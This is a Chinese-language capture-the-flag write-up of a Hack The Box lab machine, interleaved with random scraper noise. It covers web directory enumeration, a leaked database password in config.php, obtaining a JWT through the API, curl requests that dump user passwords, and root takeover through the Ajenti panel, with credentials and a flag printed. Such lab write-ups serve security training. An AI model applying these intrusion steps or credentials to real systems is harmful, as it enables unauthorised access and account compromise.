|
1 q% {, r" R9 ]) Q! |( {: e
文章目录—————— 昨日回顾 ——————渗透测试 | HTB-OneTwoSeven实战http://qiyuanxuetang.net/courses/  $ R/ `2 t6 v+ A2 [3 q
—————— 昨日回顾 ——————红日安全出品|转载请注明来源文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用任何人不得将其用于非法用途以及盈利等目的否则后果自行承担来源红日安全渗透测试 | HTB-OneTwoSeven实战  - Z9 ~2 o. q9 C' r: q% j% U
—————— —————— —————信息收集打开10.10.10.137 发现就个静态般我习惯先看下源码发现是个静态了Bootstrap 4端口测试21/tcp ftp22/tcp ssh80/tcp http " R- {3 v( x5 _1 {) Y% h- U9 X: g2 ?
3000/tcp ppp8000/tcp http-alt1. 10.10.10.137:8000 个Ajenti登陆2. 10.10.10.137:3000返回{"success":false,"message":"Auth token is not supplied"}
+ `2 @' k( L' E: {6 g q 目录遍历习惯dirsearch.py 分别对80、3000进录遍历80端发现[17:51:04] 403 - 220B - /.ht_wsr.txt[17:51:04] 403 - 222B - /.htaccess-dev 8 z0 _5 A3 L+ J5 C! n
[17:51:04] 403 - 224B - /.htaccess-local[17:51:04] 403 - 213B - /.hta[17:51:04] 403 - 224B - /.htaccess-marco
: V/ v: j; w0 v; {: s; G8 G [17:51:04] 403 - 223B - /.htaccess.bak1[17:51:04] 403 - 222B - /.htaccess.BAK[17:51:04] 403 - 222B - /.htaccess.old 2 ]' y* G$ W6 X# T/ M0 U9 ?
[17:51:05] 403 - 221B - /.htaccessOLD[17:51:05] 403 - 223B - /.htaccess.orig[17:51:05] 403 - 223B - /.htaccess_orig
/ z* O: O9 O5 e: L* l' Z( U0 B [17:51:05] 403 - 225B - /.htaccess.sample[17:51:05] 403 - 222B - /.htaccess.txt[17:51:05] 403 - 221B - /.htaccess_sc
' ~ B" P% l; v2 T [17:51:05] 403 - 221B - /.htaccessBAK[17:51:05] 403 - 224B - /.htaccess_extra[17:51:05] 403 - 223B - /.htaccess.save
8 \8 Z! r2 v* ^( R& `5 J b [17:51:05] 403 - 222B - /.htpasswd-old[17:51:05] 403 - 219B - /.htaccess~[17:51:05] 403 - 219B - /.htpasswds 3 ?0 y( a, @/ p9 Q
[17:51:05] 403 - 223B - /.htpasswd_test[17:51:05] 403 - 222B - /.htaccessOLD2[17:51:05] 403 - 217B - /.htgroup
5 ?0 j; w* G7 _2 a% v$ ^ [17:51:06] 403 - 217B - /.htusers[17:53:16] 200 - 202B - /config.php[17:53:25] 301 - 232B - /css -> http://10.10[17:54:02] 200 - 1KB - /gulpfile.js / S( L6 [: `! C8 Z0 P$ u k
[17:54:16] 200 - 3KB - /index.html[17:54:24] 301 - 231B - /js -> http://10.10.1[17:54:30] 200 - 1KB - /LICENSE
3 j. m& G1 {9 g5 y" s( m8 Y! l [17:54:36] 200 - 2KB - /login.php[17:54:43] 401 - 381B - /management[17:54:43] 401 - 381B - /management/ / {! D* P! R1 @! v
[17:54:46] 301 - 235B - /member -> http://10[17:54:46] 200 - 216B - /member/[17:55:06] 200 - 1KB - /package.json 8 U' G; [9 H- p9 w1 H; \! [2 Z4 O
[17:55:35] 200 - 4KB - /README.md其中 /management 和 login.php 也是个登陆 /config.php 包括了mysql账号密码$dbHost = localhost; $dbUsername = root; $dbPassword = Zk6heYCyv6ZE9Xcg;
1 t2 I( A' D% C' Z" M; g $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) ordie("Connect failed: %s\n". $conn -> error); * t9 m5 z: y) x. |
3000端发现[22:30:18] Starting:[22:34:38] 200 - 13B - /login[22:34:38] 200 - 13B - /Login[22:34:40] 200 - 13B - /login/
3 n ~6 m" B+ R8 v7 P- ]' c [22:35:42] 503 - 0B - /pmyadmin/[22:37:02] 200 - 56B - /users[22:37:03] 200 - 56B - /users/admin[22:37:03] 200 - 56B - /users/其中 /login 返回 "please auth" , users 也是返回 {"success":false,"message":"Auth token
4 ?, S* S. I3 U8 Q- W O is not supplied"}整合信息三个登陆10.10.10.137:8000、10.10.10.137/login.php、10.10.10.137/management个mysql账号密码root/Zk6heYCyv6ZE9Xcg
/ k4 B( [' n6 T j 10.10.10.137:3000返回信息{"success":false,"message":"Auth token is not supplied"}10.10.10.137:3000/login返回
" w- ?* h+ Y( n/ S; H% D "please auth"具体分析突破在在 "Auth token is not supplied"Google下发现是jwt认证失败的个返回信息因此推测应该构造认证信息post到10.10.10.137:3000然后获取到户凭证接着这个户凭证去请求 & Q* r6 i' f5 C# _8 j
10.10.10.137:3000/users这post的户信息概就是上的mysql账户密码因为只有这个可以了且这个账户信息尝试登陆在个登陆以及mysql服务端均没有成功使curlcurl -s -X POST -H Accept: application/json -H Content-Type:。
6 k( k3 _, p4 L% o1 C application/json --data {"usename":"admin","password":"Zk6heYCyv6ZE9Xcg"}http://10.10.10.137:3000/logi
' _. \% V3 l; H2 r$ r- l0 W a" V8 ` 回显信息Errortitle>head>SyntaxError: Unexpected token r in JSON at position 11at JSON.parse ()at parse(/nodeapp/node_modules/body-parser/lib/types/json.js:89:19)
: D( W) B. c/ Y) @; c. S8 ~( K9 Q at /nodeapp/node_modules/body-parser/lib/read.js:121:18at invokeCallback (/nodeapp/node_modules/raw-body/index.js:224:16)
2 s( ~2 n! ~/ J at done (/nodeapp/node_modules/raw-body/index.js:213:7)at IncomingMessage.onEnd (/nodeapp/node_modules/rawbody/index.js:273:7)
& M: ]' U0 [ i, c+ z/ w at IncomingMessage.emit(events.js:202:15)at endReadableNT(_stream_readable.js:1132:12)at processTicksAndRejections - Q0 J7 o5 j! h1 J, b) q/ [
(internal/process/next_tick.js:76:17)pre>body>htm不知道是什么原因估计是curl哪构造错了但是可以确定的是思路是对的换postman发送json请求  
2 B c8 M& R$ j! D5 ? tokeneyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY3NjY5MDI5LCJleHAiOjE1Njc3NTU0Mjl9.RXpmi8wbxNoRad-0grsWbMYK0a6_SVObti1aoiro8qU , k8 h1 c! k- \" U4 C5 A5 [# m8 I
这个token请求/users和/users/{user}curl -H Accept: application/json -H "Authorization: BearereyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY3N
1 W9 C( c* O, { R1 I jY5MDI5LCJleHAiOjE1Njc3NTU0Mjl9.RXpmi8wbxNoRad-0grsWbMYK0a6_SVObti1aoiro8qU"https://10.10.10.137:3000/users ( u6 @# \1 Q `! ~3 @
获取到[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"}, + y3 a. w$ D5 O
{"ID":"4","name":"Dory","Role":"Supporter"}]{"name":"Admin","password":"WX5b7)>/rp$U)FW"}%{"name":"Yuri","password":"bet@tester87"}%
$ A/ Q' E+ Q/ H1 T {"name":"Derry","password":"rZ86wwLvx7jUxtch"}%{"name":"Dory","password":"5y:!xa=ybfe)/QD"登陆到http://10.10.10.137/management访问http://10.10.10.137/management/config.json 2 n+ x% o! M7 d0 Y6 L6 C
获取到root/KpMasng6S5EtTy9Z的账户信息最后登陆到10.10.10.137:8000  ) v# c- Z d3 J6 W5 N1 F! A
flag:8448343028fadde1e2a1b0a44d01e650提权直接root/KpMasng6S5EtTy9Z登陆ssh不说明这只是web的账号但是ajenti服务是具有root权限的也说明可以任意操作了。
# `# o3 T- b! ^; m! _ File Manager翻了下配置件可以直接找到ssh的配置件/etc/sshd_config并且有编辑的权限那么修改配置项PermitRootLogin yes重新启动ssh服务再试下登陆ssh发现还是不可能root。 0 M2 J5 n. p: ]) C$ s( P/ B" e9 r/ V
密码并不是web账户密码这有Users打开并直接重置root密码不需要旧密码重置  8 S( e4 A& h2 \ C0 Q" ]& o
ssh登陆  8 f" r) n+ G1 b2 N( a2 T
海量安全课程 点击以下链接 即可观看http://qiyuanxuetang.net/courses/专栏# HTB-Luke实战# HTB渗透# 代码审计# 内网渗透# 渗透测试 , z2 B/ n6 P* ]
4 A' p' C+ N! g0 P3 h
4 D6 L; S+ |1 W8 E) P7 a
" U3 d/ g2 y* w% P0 ]4 o* H" M ~9 A( `, p7 n
| 
